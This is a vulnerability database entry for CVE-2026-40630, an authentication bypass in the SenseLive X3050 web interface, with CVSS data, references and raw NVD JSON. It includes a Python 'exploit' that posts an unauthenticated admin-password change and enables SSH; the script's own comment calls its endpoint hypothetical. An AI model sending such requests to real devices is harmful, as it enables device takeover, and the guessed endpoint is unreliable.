CVE-2026-40630

Description

A vulnerability in SenseLive X3050’s web management interface allows unauthorized access to certain configuration endpoints due to improper access control enforcement. An attacker with network access to the device may be able to bypass the intended authentication mechanism and directly interact with sensitive configuration functions.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:senselive:x3500_firmware:1.523:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:senselive:x3500:-:*:*:*:*:*:*:* - NOT VULNERABLE

SenseLive X3050 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_vulnerability(target_ip):
    # Target URL for the sensitive configuration endpoint (Hypothetical based on description)
    target_url = f"http://{target_ip}/api/v1/system/config"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Content-Type": "application/json"
    }

    # Payload to change admin password (Example)
    payload = {
        "admin_password": "hacked123",
        "ssh_enabled": True
    }

    try:
        # Send request without authentication
        response = requests.post(target_url, json=payload, headers=headers, timeout=5)
        
        if response.status_code == 200:
            print(f"[+] Vulnerability confirmed! Configuration changed on {target_ip}")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Target may not be vulnerable or endpoint has changed. Status: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    target = "192.168.1.100" # Replace with actual target IP
    check_vulnerability(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40630
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40630
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40630/
[4] VulDB https://vuldb.com/cve/CVE-2026-40630
[5] https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-111-12.json
[6] https://senselive.io/contact
[7] https://www.cisa.gov/news-events/ics-advisories/icsa-26-111-12

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40630", "sourceIdentifier": "[email protected]", "published": "2026-04-24T00:16:29.040", "lastModified": "2026-04-28T19:01:59.677", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in \nSenseLive \n\nX3050’s web management interface allows unauthorized access to certain configuration endpoints due to improper access control enforcement. An attacker with network access to the device may be able to bypass the intended authentication mechanism and directly interact with sensitive configuration functions."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:senselive:x3500_firmware:1.523:*:*:*:*:*:*:*", "matchCriteriaId": "F0A28FFE-3268-48DC-BB85-77009904F0D0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:senselive:x3500:-:*:*:*:*:*:*:*", "matchCriteriaId": "42742F99-96EF-412E-9D7C-8C2155C3DCE1"}]}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-111-12.json", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://senselive.io/contact", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-111-12", "source": "[email protected]", "tags": ["US Government Resource"]}]}}